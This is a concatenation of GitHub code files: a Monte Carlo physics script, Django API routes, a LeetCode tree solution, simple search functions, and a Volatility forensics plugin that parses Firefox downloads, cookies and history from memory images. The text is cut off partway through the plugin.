N_acc1 = 0\n    \n    # Equilibration with chosen steps \n    \n    for s in range(0,N_eq): # fixed number of equilibration steps before statistics are accumulated\n        \n        # (the adaptive scheme below tunes Delta so the acceptance ratio stays near 50%)\n\n        x, N_acc1, wf2 = metropolis(x, N_acc1, wf2, Delta, alpha_s)\n        \n        # An adaptive scheme for Delta \n        \n        if s != 0 and s%5 == 0:\n            \n            if N_acc1 / s >= 0.55:\n                \n                Delta += 0.05 * 4\n                \n            elif N_acc1 / s <= 0.45:\n                \n                Delta -= 0.05 * 4\n    \n    # Simulation Steps\n\n    N_acc2 = 0\n    cum_en = np.zeros(len(dalpha)) # Reset cumulative variable\n    cum_en2 = np.zeros(len(dalpha)) # Reset cumulative variable\n    cum_w = np.zeros(len(dalpha))\n    mean_en = np.zeros(len(dalpha))\n    std_en = np.zeros(len(dalpha))\n\n    for s in range(0, N_steps):\n\n        x, N_acc2, wf2 = metropolis(x, N_acc2, wf2, Delta, alpha_s)\n        \n        # An adaptive scheme for Delta \n        \n        if s != 0 and s%5 == 0:\n            \n            if N_acc2 / s >= 0.55:\n                \n                Delta += 0.05 * 4\n                \n            elif N_acc2 / s <= 0.45:\n                \n                Delta -= 0.05 * 4\n        \n        # Compute local energy and weight\n        \n        
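# Reweighting estimator: with samples x drawn from |Psi_s|**2, the energy at each\n        # trial alpha_i is estimated as <E>_i ~ sum_x w_i(x)*E_L,i(x) / sum_x w_i(x);\n        # the cumulative sums below accumulate exactly these numerators and denominators\n        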
weight, loc_en = reweighting(alpha, alpha_s, x)\n        \n        #print(weight)\n        \n        for i in range(0,len(dalpha)):\n            \n            cum_w[i] += weight[i]\n            cum_en[i] += loc_en[i] \n            cum_en2[i] += (loc_en[i])**2\n        \n    for i in range(0,len(dalpha)):\n        \n        mean_en[i] = cum_en[i] / cum_w[i] \n        # abs() guards against reweighting noise, which can make this variance\n        # estimate come out slightly negative\n        std_en[i] = m.sqrt( 1 / (N_steps-1) * abs( cum_en2[i] / cum_w[i] - mean_en[i]**2) )\n\n    accf = N_acc2/N_steps\n    \n    return alpha, accf, mean_en, std_en\n\n\n# EXECUTION OF THE PROCEDURE\n\n# Start procedure timing\n\nstart = time.time()\n\n# Set initial conditions\n\nx = 0\n\n# Run the MC simulation\n\nalpha, accept, mean, std = montecarlo(x)\n\n# the variational estimate is the minimum of E(alpha) over the grid\nprint(\"\\n The energy is {} pm {}\".format(np.min(mean), std[np.argmin(mean)]))\n\n# Plot the energy as a function of the variational parameter\n\nfig, ax= plt.subplots(1, figsize=(8,5.5))\nplt.errorbar(alpha, mean, std, elinewidth=1, linewidth = 0, marker=\".\", ms = 3, mec=\"blue\", mfc=\"blue\", label=\"Simulation Result\")\nplt.grid()\nplt.axhline(0.5, linewidth = 0.8, c= \"red\", label=\"Exact Value\")\n# plt.xlim([0.9,1.1])\n# plt.ylim([0.49, 0.51]) # Uncomment to see that tiny errorbars are actually there\nplt.xlabel(r\"$\\alpha$\", fontsize=14)\nplt.ylabel(\"Energy\", fontsize=14)\nplt.title(\"Energy\", fontsize=18)\nplt.legend()\nplt.savefig(\"Energies.png\", dpi = 300)\n\n# Plot the std as a function of alpha\n\nfig, ax= plt.subplots(1, figsize=(8,5.5))\nplt.plot(alpha, std, linewidth = 0, marker=\".\", ms = 3, mec=\"blue\", mfc=\"blue\")\nplt.grid()\n# plt.xlim([0.9,1.1])\n# plt.ylim([0.49, 0.51]) # Uncomment to see that tiny errorbars are actually there\nplt.xlabel(r\"$\\alpha$\", fontsize=14)\nplt.ylabel(\"Std\", fontsize=14)\nplt.title(\"Standard Deviation\", fontsize=18)\nplt.savefig(\"Standard Deviation.png\", dpi = 300)\n\n# End procedure timing\n\nend = time.time()\n\nprint(\"\\n The simulation took me {} seconds\".format(end-start))","repo_name":"NerusSkyhigh/computationalphysics2021","sub_path":"Exercise_4/Warmup_HO/Warmup_HO_Reweight.py","file_name":"Warmup_HO_Reweight.py","file_ext":"py","file_size_in_byte":6205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74103854454","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n    url(r'^register/$', views.register, name='register'),\n    url(r'^authenticate/$', views.authenticate, name='authenticate'),\n    url(r'^update_fcm_id/$', views.update_fcm_id, name='update_fcm_id'),\n    url(r'^upload_photo/$', views.upload_photo, name='upload_photo'),\n    url(r'^login/$', views.login, name='login'),\n    url(r'^select_likes/$', views.select_likes, name='select_likes'),\n    url(r'^update_users/$', views.update_users, name='update_users'),\n    url(r'^get_matches/$', views.get_matches, name='get_matches'),\n    url(r'^send_message/$', views.send_message, name='send_message'),\n    url(r'^get_messages/$', views.get_messages, name='get_messages'),\n    url(r'^logout/$', views.logout, name='logout'),\n    url(r'^get_location_info/$', views.get_location_info, name='get_location_info'),\n    url(r'^get_user_counts/$', views.get_user_counts, name='get_user_counts'),\n]\n","repo_name":"fedja-tica/flirtapp-api","sub_path":"web_api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28502992831","text":"# 971. 
Flip Binary Tree To Match Preorder Traversal\n\n# Medium\n\n# You are given the root of a binary tree with n nodes, where each node\n# is uniquely assigned a value from 1 to n. You are also given a\n# sequence of n values voyage, which is the desired pre-order traversal\n# of the binary tree.\n\n# Any node in the binary tree can be flipped by swapping its left and\n# right subtrees. For example, flipping node 1 will have the following\n# effect:\n\n\n# Flip the smallest number of nodes so that the pre-order traversal of\n# the tree matches voyage.\n\n# Return a list of the values of all flipped nodes. You may return the\n# answer in any order. If it is impossible to flip the nodes in the tree\n# to make the pre-order traversal match voyage, return the list [-1].\n\n# Example 1:\n# Input: root = [1,2], voyage = [2,1]\n# Output: [-1]\n# Explanation: It is impossible to flip the nodes such that the\n# pre-order traversal matches voyage.\n\n# Example 2:\n# Input: root = [1,2,3], voyage = [1,3,2]\n# Output: [1]\n# Explanation: Flipping node 1 swaps nodes 2 and 3, so the pre-order\n# traversal matches voyage.\n\n# Example 3:\n# Input: root = [1,2,3], voyage = [1,2,3]\n# Output: []\n# Explanation: The tree's pre-order traversal already matches voyage, so\n# no nodes need to be flipped.\n\n# Constraints:\n# The number of nodes in the tree is n.\n# n == voyage.length\n# 1 <= n <= 100\n# 1 <= Node.val, voyage[i] <= n\n# All the values in the tree are unique.\n# All the values in voyage are unique.\n\nfrom typing import List\nfrom utils import checkList, TreeNode, treeFromArray\n\n\nclass Solution:\n def flipMatchVoyage(self, root: TreeNode, voyage: List[int]) -> List[int]:\n res = []\n\n def preorder(node, i):\n if not node:\n return i - 1\n if i == -1 or node.val != voyage[i]:\n return -1\n\n t = preorder(node.left, i + 1)\n if t >= 0:\n return preorder(node.right, t + 1)\n\n res.append(node.val)\n t = preorder(node.right, i + 1)\n if t >= 0:\n return preorder(node.left, t + 1)\n return -1\n\n i = preorder(root, 0)\n return res if i > -1 else [-1]\n\n\nt = Solution()\nprint(t.flipMatchVoyage(treeFromArray([1, 2, 3], 0), [1, 3, 2]))\n","repo_name":"DmitryVlaznev/leetcode","sub_path":"971-flip-binary-tree-to-match-preorder-traversal.py","file_name":"971-flip-binary-tree-to-match-preorder-traversal.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"70093891949","text":"def Binary(arr,number):\n '''\n this is the fastest Search algorithm,but the array must completion sort.\n '''\n l = 0 #the left number index\n r = len(arr) #the right number index\n while True:\n m = int((l+r)/2) #Middle index\n n = arr[m] #Middle number.\n if number==n:\n return m\n if number > n:\n l = m\n if number < n:\n r = m\n\n\ndef Linear(arr,number):\n '''\none by one search number.\n '''\n i = -1\n for x in arr:\n i = i+1\n if x==number:\n return i\n","repo_name":"icaijy/my-main-code","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34688685994","text":"import volatility.plugins.common as common\nimport volatility.scan as scan\nimport volatility.utils as utils\nimport volatility.addrspace as addrspace\nimport volatility.debug as debug\nimport volatility.obj as obj\nimport binascii\nimport sqlite_help\nimport csv\nfrom datetime import datetime\n\nFORWARD = 
sqlite_help.FORWARD\nBACKWARD = sqlite_help.BACKWARD\n\nclass FirefoxScanner(scan.BaseScanner):\n checks = [ ] \n\n def __init__(self, needles = None):\n self.needles = needles\n self.checks = [ (\"MultiStringFinderCheck\", {'needles':needles})]\n scan.BaseScanner.__init__(self) \n\n def scan(self, address_space, offset = 0, maxlen = None):\n for offset in scan.BaseScanner.scan(self, address_space, offset, maxlen):\n yield offset\n\n\n\nclass FirefoxDownloads(common.AbstractWindowsCommand):\n \"\"\" Scans for and parses potential Firefox download records -- downloads.sqlite moz_downloads table pre FF26 only\"\"\"\n\n def __init__(self, config, *args, **kwargs):\n common.AbstractWindowsCommand.__init__(self, config, *args, **kwargs)\n\n def calculate(self):\n address_space = utils.load_as(self._config, astype = 'physical')\n\n # definite values in Downloads records\n scanner = FirefoxScanner(needles = ['\\x06\\x06\\x08',\n '\\x06\\x06\\x09',\n ])\n downloads = {}\n for offset in scanner.scan(address_space):\n ff_buff = address_space.read(offset-16, 3000)\n start = 16\n\n good = False\n\n start -= 1\n (tempPath_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n tempPath_length = sqlite_help.varint_to_text_length(tempPath_length)\n\n # work backward from the start of the needle to the first field payload_length\n start -= varint_len\n (target_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n target_length = sqlite_help.varint_to_text_length(target_length)\n\n start -= varint_len\n (source_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n source_length = sqlite_help.varint_to_text_length(source_length)\n\n start -= varint_len\n (name_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n name_length = sqlite_help.varint_to_text_length(name_length)\n\n start -= varint_len\n (id_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n\n start -= varint_len\n (payload_header_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n\n start -= varint_len\n (row_id, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n\n start -= varint_len\n (payload_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n\n # jump back to the needle, startTime_length\n start = 16\n\n # get all of the single byte lengths around the needle\n (startTime_length, startTime) = sqlite_help.varint_type_to_length(ord(ff_buff[start]))\n (endTime_length, endTime) = sqlite_help.varint_type_to_length(ord(ff_buff[start+1]))\n (state_length, state) = sqlite_help.varint_type_to_length(ord(ff_buff[start+2]))\n\n # get the rest of the fields in the row moving forward\n start = 19\n (referrer_length, varint_len) = sqlite_help.find_varint(ff_buff, start, FORWARD)\n referrer_length = sqlite_help.varint_to_text_length(referrer_length)\n start += varint_len\n\n (entityID_length, varint_len) = sqlite_help.find_varint(ff_buff, start, FORWARD)\n entityID_length = sqlite_help.varint_to_text_length(entityID_length)\n start += varint_len\n\n (currBytes_length, currBytes) = sqlite_help.varint_type_to_length(ord(ff_buff[start]))\n (maxBytes_length, maxBytes) = sqlite_help.varint_type_to_length(ord(ff_buff[start+1]))\n\n start += 2\n\n (mimeType_length, varint_len) = sqlite_help.find_varint(ff_buff, start, FORWARD)\n mimeType_length = sqlite_help.varint_to_text_length(mimeType_length)\n start += varint_len\n\n (preferredApplication_length, varint_len) = sqlite_help.find_varint(ff_buff, start, 
FORWARD)\n preferredApplication_length = sqlite_help.varint_to_text_length(preferredApplication_length)\n start += varint_len\n\n (preferredAction_length, preferredAction) = sqlite_help.varint_type_to_length(ord(ff_buff[start]))\n (autoResume_length, autoResume) = sqlite_help.varint_type_to_length(ord(ff_buff[start+1]))\n\n start += 2\n \n name = ff_buff[start:start+name_length]\n start += name_length\n\n source = ff_buff[start:start+source_length]\n start += source_length\n\n target = ff_buff[start:start+target_length]\n start += target_length\n\n tempPath = ff_buff[start:start+tempPath_length]\n start += tempPath_length\n\n # do some checks on the startTime/endTime to make sure they are valid\n startTime = ff_buff[start:start+startTime_length]\n startTime = sqlite_help.sql_unpack(startTime)\n if startTime > 0 and startTime:\n startTime = sqlite_help.get_nixtime_from_msec(startTime)\n if type(startTime) is not datetime:\n continue\n start += startTime_length\n\n endTime = ff_buff[start:start+endTime_length]\n endTime = sqlite_help.sql_unpack(endTime)\n if endTime > 0 and startTime:\n endTime = sqlite_help.get_nixtime_from_msec(endTime)\n if type(endTime) is not datetime:\n continue\n start += endTime_length\n\n # if both dates are 1970, it's probably a bad record and not very useful, so skip\n # if only 1 is 1970, print it because it may be an old record with one valid date\n if startTime.year == 1970 and endTime.year == 1970:\n continue\n\n if state_length > 0:\n state = sqlite_help.sql_unpack(ff_buff[start:start+state_length])\n start += state_length\n\n referrer = ff_buff[start:start+referrer_length]\n start += referrer_length\n\n entityID = ff_buff[start:start+entityID_length]\n start += entityID_length\n\n currBytes = ff_buff[start:start+currBytes_length]\n currBytes = sqlite_help.sql_unpack(currBytes)\n # skip if negative or greater than 1TB\n if currBytes < 0 or currBytes > 1000000000000:\n continue\n start += currBytes_length\n\n maxBytes = ff_buff[start:start+maxBytes_length]\n maxBytes = sqlite_help.sql_unpack(maxBytes)\n # skip if negative or greater than 1TB\n if maxBytes < 0 or maxBytes > 1000000000000:\n continue\n start += maxBytes_length\n\n mimeType = ff_buff[start:start+mimeType_length]\n start += mimeType_length\n\n preferredApplication = ff_buff[start:start+preferredApplication_length]\n start += preferredApplication_length\n\n # these fields can have a value 0x8 or 0x9 in the length field\n # in that case, the \"data\" portion is not there, and the value is impled \n # to be 0 or 1, respectively\n if preferredAction_length > 0:\n preferredAction = ff_buff[start:start+preferredAction_length]\n preferredAction = sqlite_help.sql_unpack(preferredAction)\n start += preferredAction_length\n \n if autoResume_length > 0:\n autoResume = ff_buff[start:start+autoResume_length]\n autoResume = sqlite_help.sql_unpack(autoResume)\n start += autoResume_length\n\n # add all the fields to a tuple so we only print a unique record once\n downloads_tuple = (row_id, name, source, target, tempPath, startTime, endTime, state, referrer, entityID, currBytes, maxBytes, mimeType, preferredApplication, preferredAction, autoResume)\n if not downloads.get(downloads_tuple):\n downloads[downloads_tuple] = downloads.get(downloads_tuple, 0) + 1\n yield downloads_tuple\n\n def render_text(self, outfd, data):\n self.table_header(outfd, [(\"Row Id\", \"6\"), (\"Name\", \"32\"), (\"Source\", \"80\"), (\"Target\", \"60\"), (\"Temp Path\", \"32\"), (\"Start Time\", \"26\"), (\"End Time\", \"26\"), 
(\"State\", \"5\"), (\"Referrer\", \"60\"), (\"Entity ID\", \"9\"), (\"Current Bytes\", \"12\"), (\"Max Bytes\", \"12\"), (\"MIME Type\", \"20\"), (\"Prefer App\", \"16\"), (\"Prefer Action\", \"13\"), (\"Auto Resume\", \"11\")])\n for row_id, name, source, target, tempPath, startTime, endTime, state, referrer, entityID, currBytes, maxBytes, mimeType, preferredApplication, preferredAction, autoResume in data:\n self.table_row(outfd, row_id, name, source, target, tempPath, str(startTime), str(endTime), state, referrer, entityID, currBytes, maxBytes, mimeType, preferredApplication, preferredAction, autoResume)\n\n def render_csv(self, outfd, data):\n outfd.write('\"id\",\"name\",\"source\",\"target\",\"temp_path\",\"start_time\",\"end_time\",\"state\",\"referrer\",\"entity_id\",\"current_bytes\",\"max_bytes\",\"mime_type\",\"prefer_app\",\"prefer_action\",\"auto_resume\"\\n')\n for d in data:\n csv.writer(outfd,quoting=csv.QUOTE_ALL).writerow(d)\n\n def render_body(self, outfd, data):\n for row_id, name, source, target, tempPath, startTime, endTime, state, referrer, entityID, currBytes, maxBytes, mimeType, preferredApplication, preferredAction, autoResume in data:\n start = sqlite_help.unix_time(startTime)\n end = sqlite_help.unix_time(endTime)\n download = source + \" -> \" + target + \" (\" + str(maxBytes) + \" bytes)\"\n download = download.replace(\"|\", \"-\")\n d = (0, \"[FIREFOXDOWNLOADS] \" + download, 0, \"---------------\", 0, 0, 0, 0, end, 0, start)\n csv.writer(outfd,delimiter=\"|\",quoting=csv.QUOTE_NONE,escapechar=\"\\\\\").writerow(d)\n\n\n\nclass FirefoxCookies(common.AbstractWindowsCommand):\n \"\"\" Scans for and parses potential Firefox cookies (cookies.sqlite moz_cookies table\"\"\"\n\n def __init__(self, config, *args, **kwargs):\n common.AbstractWindowsCommand.__init__(self, config, *args, **kwargs)\n\n def calculate(self):\n address_space = utils.load_as(self._config, astype = 'physical')\n\n # definite values in Cookie records\n scanner = FirefoxScanner(needles = ['\\x04\\x06\\x06\\x08',\n '\\x04\\x06\\x06\\x09',\n '\\x05\\x06\\x06\\x08',\n '\\x05\\x06\\x06\\x09',\n ])\n cookies = {}\n for offset in scanner.scan(address_space):\n ff_buff = address_space.read(offset-16, 4200)\n start = 16\n if (ord(ff_buff[start+4]) in (8,9)):\n good = False\n \n # start before the needle match and work backwards to the first record payload length\n start -= 1\n (path_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n path_length = sqlite_help.varint_to_text_length(path_length)\n\n start -= varint_len\n (host_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n host_length = sqlite_help.varint_to_text_length(host_length)\n\n start -= varint_len\n (value_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n value_length = sqlite_help.varint_to_text_length(value_length)\n\n start -= varint_len\n (name_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n name_length = sqlite_help.varint_to_text_length(name_length)\n start -= varint_len\n\n # newer versions add appId and inBrowserElement, they are INTEGER type \n # so if they exist, they will both have length values less than 12\n inBrowserElement_length = 0\n inBrowserElement = \"n/a\"\n appId_length = 0\n appId = \"n/a\"\n # if they don't exist, the previous value is a var int and could be something\n # like 0x81 0x10, so wee need to check both bytes\n if 0 < ord(ff_buff[start]) < 12 and 0 < ord(ff_buff[start-1]) < 12:\n (inBrowserElement_length, 
inBrowserElement) = sqlite_help.varint_type_to_length(ord(ff_buff[start]))\n                    (appId_length, appId) = sqlite_help.varint_type_to_length(ord(ff_buff[start-1]))\n                    start -= 2\n\n                (baseDomain_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n                baseDomain_length = sqlite_help.varint_to_text_length(baseDomain_length)\n\n                start -= varint_len\n                (cookie_id_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n\n                start -= varint_len\n                (payload_header_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n\n                start -= varint_len\n                (row_id, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n\n                start -= varint_len\n                (payload_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n\n                # start of record reached, so jump back to the needle, then work forward\n                start = 16\n\n                (expiry_length, expiry) = sqlite_help.varint_type_to_length(ord(ff_buff[start]))\n                (lastAccessed_length, lastAccessed) = sqlite_help.varint_type_to_length(ord(ff_buff[start+1]))\n                (creationTime_length, creationTime) = sqlite_help.varint_type_to_length(ord(ff_buff[start+2]))\n                (isSecure_length, isSecure) = sqlite_help.varint_type_to_length(ord(ff_buff[start+3]))\n                (isHttpOnly_length, isHttpOnly) = sqlite_help.varint_type_to_length(ord(ff_buff[start+4]))\n\n                start += 5\n\n                cookie_id = ff_buff[start:start+cookie_id_length]\n                cookie_id = sqlite_help.sql_unpack(cookie_id)\n\n                baseDomain = ff_buff[start:start+baseDomain_length]\n                start += baseDomain_length\n\n                # if the length is > 0, it will need to be set\n                # if it == 0, it was already set in the call earlier\n                # otherwise, the value should be \"n/a\" from initialization because it's an older version\n                if inBrowserElement_length > 0:\n                    inBrowserElement = ff_buff[start:start+inBrowserElement_length]\n                    inBrowserElement = sqlite_help.sql_unpack(inBrowserElement)\n                    start += inBrowserElement_length\n                \n                if appId_length > 0:\n                    appId = ff_buff[start:start+appId_length]\n                    appId = sqlite_help.sql_unpack(appId)\n                    start += appId_length\n\n                name = ff_buff[start:start+name_length]\n                start += name_length\n\n                value = ff_buff[start:start+value_length]\n                start += value_length\n\n                host = ff_buff[start:start+host_length]\n                start += host_length\n\n                path = ff_buff[start:start+path_length]\n                start += path_length\n\n                # get the 3 time fields and do a check that a valid date is returned\n                expiry = ff_buff[start:start+expiry_length]\n                expiry = sqlite_help.sql_unpack(expiry)\n                if expiry > 0 and expiry:\n                    expiry = sqlite_help.get_nixtime_from_sec(expiry)\n                if type(expiry) is not datetime:\n                    continue\n                start += expiry_length\n\n                lastAccessed = ff_buff[start:start+lastAccessed_length]\n                lastAccessed = sqlite_help.sql_unpack(lastAccessed)\n                if lastAccessed > 0 and lastAccessed:\n                    lastAccessed = sqlite_help.get_nixtime_from_msec(lastAccessed)\n                if type(lastAccessed) is not datetime:\n                    continue\n                start += lastAccessed_length\n\n                creationTime = ff_buff[start:start+creationTime_length]\n                creationTime = sqlite_help.sql_unpack(creationTime)\n                if creationTime > 0 and creationTime:\n                    creationTime = sqlite_help.get_nixtime_from_msec(creationTime)\n                if type(creationTime) is not datetime:\n                    continue\n                start += creationTime_length\n\n                # if all 3 dates are 1970, it's likely a garbage record, so skip\n                # if any of them are real dates, it could be an old or partially overwritten record, so print\n                if expiry.year == 1970 and lastAccessed.year == 1970 and creationTime.year == 1970:\n                    continue\n\n                if isSecure_length > 0:\n                    
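# SQLite serial types 8 and 9 encode the integer constants 0 and 1 with a\n                    # zero-byte payload, so there are only bytes to read when the length is non-zero\n                    isSecure = 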
ff_buff[start:start+isSecure_length]\n isSecure = sqlite_help.sql_unpack(isSecure)\n start += isSecure_length\n \n if isHttpOnly_length > 0:\n isHttpOnly = ff_buff[start:start+isHttpOnly_length]\n isHttpOnly = sqlite_help.sql_unpack(isHttpOnly)\n start += isHttpOnly_length\n \n # add all fields to the tuple so we only print unique records once\n cookie_tuple = (row_id, baseDomain, appId, inBrowserElement, name, value, host, path, expiry, lastAccessed, creationTime, isSecure, isHttpOnly)\n if not cookies.get(cookie_tuple):\n cookies[cookie_tuple] = cookies.get(cookie_tuple, 0) + 1\n yield cookie_tuple\n\n def render_text(self, outfd, data):\n self.table_header(outfd, [(\"Row ID\", \"6\"), (\"Base Domain\", \"28\"), (\"App Id\",\"6\"), (\"InBrowserElement\", \"16\"), (\"Name\", \"24\"), (\"Value\", \"32\"), (\"Host\", \"32\"), (\"Path\", \"32\"), (\"Expiry\", \"20\"), (\"Last Accessed\", \"26\"), (\"Creation Time\", \"26\"), (\"Secure\", \"6\"), (\"HttpOnly\", \"6\")])\n for row_id, baseDomain, appId, inBrowserElement, name, value, host, path, expiry, lastAccessed, creationTime, isSecure, isHttpOnly in data:\n self.table_row(outfd, row_id, baseDomain, appId, inBrowserElement, name, value, host, path, str(expiry), str(lastAccessed), str(creationTime), isSecure, isHttpOnly)\n\n def render_csv(self, outfd, data):\n outfd.write('\"id\",\"base_domain\",\"app_id\",\"inbrowserelement\",\"name\",\"value\",\"host\",\"path\",\"expiry\",\"last_accessed\",\"creation_time\",\"secure\",\"httponly\"\\n')\n for d in data:\n csv.writer(outfd,quoting=csv.QUOTE_ALL).writerow(d)\n\n def render_body(self, outfd, data):\n for row_id, baseDomain, appId, inBrowserElement, name, value, host, path, expiry, lastAccessed, creationTime, isSecure, isHttpOnly in data:\n start = sqlite_help.unix_time(creationTime)\n end = sqlite_help.unix_time(lastAccessed)\n cookie = host + \" \" + path + \" \" + name + \" = \" + value\n cookie = cookie.replace(\"|\", \"-\")\n d = (0, \"[FIREFOXCOOKIES] \" + cookie, 0, \"---------------\", 0, 0, 0, 0, end, 0, start)\n csv.writer(outfd,delimiter=\"|\",quoting=csv.QUOTE_NONE,escapechar=\"\\\\\").writerow(d)\n\n\n\nclass FirefoxHistory(common.AbstractWindowsCommand):\n \"\"\" Scans for and parses potential Firefox url history (places.sqlite moz_places table)\"\"\"\n\n def __init__(self, config, *args, **kwargs):\n common.AbstractWindowsCommand.__init__(self, config, *args, **kwargs)\n\n def calculate(self):\n address_space = utils.load_as(self._config, astype = 'physical')\n\n # definite values in History records\n scanner = FirefoxScanner(needles = ['\\x06\\x25',\n '\\x00\\x25',\n ])\n urls = {}\n for offset in scanner.scan(address_space):\n ff_buff = address_space.read(offset-21, 3000)\n start = 21\n # new field foreign_count added around Firefox v34\n foreign_count_length = 0\n foreign_count = \"N/A\"\n\n # start before the needle match and work backwards\n if ord(ff_buff[start-1]) in (1, 2, 8, 9):\n start -= 1\n (frecency_length, frecency) = sqlite_help.varint_type_to_length(ord(ff_buff[start]))\n else:\n continue\n\n if ord(ff_buff[start-1]) in (0, 1, 8, 9):\n start -= 1\n (favicon_id_length, favicon_id) = sqlite_help.varint_type_to_length(ord(ff_buff[start]))\n else:\n continue\n\n if ord(ff_buff[start-1]) not in (8, 9):\n continue\n start -= 1\n (typed_length, typed) = sqlite_help.varint_type_to_length(ord(ff_buff[start]))\n\n if ord(ff_buff[start-1]) not in (8, 9):\n continue\n start -= 1\n (hidden_length, hidden) = sqlite_help.varint_type_to_length(ord(ff_buff[start]))\n\n if 
ord(ff_buff[start-1]) in (1, 8, 9):\n start -= 1\n (visit_count_length, visit_count) = sqlite_help.varint_type_to_length(ord(ff_buff[start]))\n else:\n continue\n\n start -= 1\n (rev_host_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n rev_host_length = sqlite_help.varint_to_text_length(rev_host_length)\n\n start -= varint_len\n (title_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n title_length = sqlite_help.varint_to_text_length(title_length)\n \n start -= varint_len\n (url_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n url_length = sqlite_help.varint_to_text_length(url_length)\n \n start -= varint_len\n url_id_length = ord(ff_buff[start])\n\n start -= 1\n payload_header_length = ord(ff_buff[start])\n payload_header_end = start + payload_header_length\n\n start -= 1\n (row_id, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n # can't have a negative row_id (index)\n if row_id < 0:\n continue\n\n start -= varint_len\n if start < 0:\n continue\n (payload_length, varint_len) = sqlite_help.find_varint(ff_buff, start, BACKWARD)\n\n # payload_length should be much longer than this, but this is a safe minimum\n if payload_length < 6:\n continue\n\n # go back to the needle match and start processing forward\n (last_visit_date_length, last_visit_date) = sqlite_help.varint_type_to_length(ord(ff_buff[21]))\n (guid_length, varint_len) = sqlite_help.find_varint(ff_buff, 22, FORWARD)\n guid_length = sqlite_help.varint_to_text_length(guid_length)\n start = 22 + varint_len\n\n # Firefox added a \"foreign_count\" field that needs to be handled\n if start != payload_header_end:\n (foreign_count_length, foreign_count) = sqlite_help.varint_type_to_length(ord(ff_buff[start]))\n start += 1\n\n url_id = sqlite_help.sql_unpack(ff_buff[start:start+url_id_length])\n\n start += url_id_length\n url = ff_buff[start:start+url_length]\n\n start += url_length\n title = ff_buff[start:start+title_length]\n\n start += title_length\n rev_host = ff_buff[start:start+rev_host_length]\n\n start += rev_host_length\n if visit_count_length > 0:\n visit_count = sqlite_help.sql_unpack(ff_buff[start:start+visit_count_length])\n\n start += visit_count_length\n if hidden_length > 0:\n hidden = sqlite_help.sql_unpack(ff_buff[start:start+hidden_length])\n\n start += hidden_length\n if typed_length > 0:\n typed = sqlite_help.sql_unpack(ff_buff[start:start+typed_length])\n\n start += typed_length\n favicon_id = \"\"\n if favicon_id_length > 0:\n favicon_id = sqlite_help.sql_unpack(ff_buff[start:start+favicon_id_length])\n\n start += favicon_id_length\n if frecency_length > 0:\n frecency = sqlite_help.sql_unpack(ff_buff[start:start+frecency_length])\n\n # extract the time, unpack it to an integer, convert microseconds to string\n start += frecency_length\n last_visit_date = ff_buff[start:start+last_visit_date_length]\n last_visit_date = sqlite_help.sql_unpack(last_visit_date)\n if last_visit_date_length == 8 and last_visit_date < 0:\n continue\n if last_visit_date > 1 and last_visit_date:\n last_visit_date = sqlite_help.get_nixtime_from_msec(last_visit_date)\n if last_visit_date_length == 8 and type(last_visit_date) is datetime and last_visit_date.year == 1970:\n continue\n\n start += last_visit_date_length\n guid = ff_buff[start:start+guid_length]\n\n start += guid_length\n if foreign_count_length > 0:\n foreign_count = sqlite_help.sql_unpack(ff_buff[start:start+foreign_count_length])\n start += foreign_count_length\n\n # save the values as a 
tuple in a dictionary so we only print one unique row\n            url_tuple = (row_id, url, title, rev_host, visit_count, hidden, typed, favicon_id, frecency, last_visit_date, guid, foreign_count) \n            if not urls.get(url_tuple):\n                urls[url_tuple] = urls.get(url_tuple, 0) + 1\n                yield url_tuple\n\n    def render_text(self, outfd, data):\n        self.table_header(outfd, [(\"ID\", \"6\"), (\"URL\", \"80\"), (\"Title\", \"80\"), (\"Rev Host\", \"32\"), (\"Visits\", \"6\"), (\"Hidden\", \"6\"), (\"Typed\", \"5\"), (\"Favicon ID\", \"10\"), (\"Frecency\", \"8\"), (\"Last Visit Date\", \"26\"), (\"GUID\", \"12\"),(\"FOREIGN COUNT\",\"13\")])\n        for row_id, url, title, rev_host, visit_count, hidden, typed, favicon_id, frecency, last_visit_date, guid, foreign_count in data:\n            self.table_row(outfd, row_id, url, title, rev_host, visit_count, hidden, typed, favicon_id, frecency, str(last_visit_date), guid, foreign_count)\n\n    def render_csv(self, outfd, data):\n        outfd.write('\"id\",\"url\",\"title\",\"rev_host\",\"visit_count\",\"hidden\",\"typed\",\"favicon_id\",\"frecency\",\"last_visit_date\",\"guid\",\"foreign_count\"\\n')\n        for d in data:\n            csv.writer(outfd,quoting=csv.QUOTE_ALL).writerow(d)\n\n    def render_body(self, outfd, data):\n        # the yielded tuples carry 12 fields, so foreign_count must be unpacked here as well\n        for row_id, url, title, rev_host, 